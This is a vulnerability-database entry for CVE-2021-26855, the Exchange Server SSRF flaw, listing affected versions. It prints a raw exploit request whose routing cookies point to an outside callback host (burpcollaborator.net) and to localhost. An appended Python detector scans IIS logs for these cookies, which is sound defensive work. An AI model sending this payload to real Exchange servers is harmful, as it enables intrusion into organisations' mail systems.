
CVE-2021-26855 – Exchange Server SSRF Vulnerability

A free, open vulnerability database that anyone can edit (PwnWiki.Com)


Vulnerability overview

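A server-side request forgery (SSRF) vulnerability in Exchange. An attacker who exploits this vulnerability can send arbitrary HTTP requests and authenticate as the Exchange Server.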

Affected versions

Microsoft Exchange Server: 2010

Microsoft Exchange Server: 2013

Microsoft Exchange Server: 2016

Microsoft Exchange Server: 2019

SSRF

GET /owa/auth/x.js HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
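
A defensive check for the request pattern shown above, as an added example that is not part of the original page: it scans IIS W3C log lines (assuming the cs(Cookie) field is enabled in logging) for X-BEResource or X-AnonResource-Backend cookie values that carry a host followed by a path and a ~N suffix. The log lines, the regular-expression heuristic and the function names are assumptions made for this illustration.

```python
import re

# Cookies that select the back-end target in the request shown on this page.
ROUTING_COOKIES = ("x-beresource", "x-anonresource-backend")
# Heuristic (assumption): flag values shaped like host/path...~N, i.e. a URL
# path where only a server name and a numeric suffix would be expected.
SUSPICIOUS_VALUE = re.compile(r"^[^/~]+/.*~\d+$")

# Constructed sample log (not real traffic). IIS writes spaces as '+'.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs(Cookie)",
    "2021-03-05 10:00:01 192.0.2.10 GET /owa/auth/logon.aspx ClientId=ABC123",
    "2021-03-05 10:00:03 192.0.2.11 GET /owa/ X-BEResource=mbx01.example.local~1941962753",
    "2021-03-05 10:00:07 198.51.100.7 GET /owa/auth/x.js X-AnonResource=true;+X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3;+X-BEResource=localhost/owa/auth/logon.aspx?~3;",
]

def parse_cookies(raw):
    """Split a Cookie header (or IIS cs(Cookie) field) into a lower-cased dict."""
    cookies = {}
    for part in raw.replace("+", " ").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.lower()] = value
    return cookies

def scan_w3c(lines):
    """Return (client_ip, uri, cookie_name, value) tuples for suspicious entries."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        cookies = parse_cookies(row.get("cs(Cookie)", ""))
        for name in ROUTING_COOKIES:
            value = cookies.get(name, "")
            if SUSPICIOUS_VALUE.match(value):
                hits.append((row.get("c-ip"), row.get("cs-uri-stem"), name, value))
    return hits

if __name__ == "__main__":
    for hit in scan_w3c(SAMPLE_LOG):
        print("suspicious routing cookie:", hit)
```

Because the pattern is a heuristic, a match is a lead to investigate rather than proof of exploitation.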
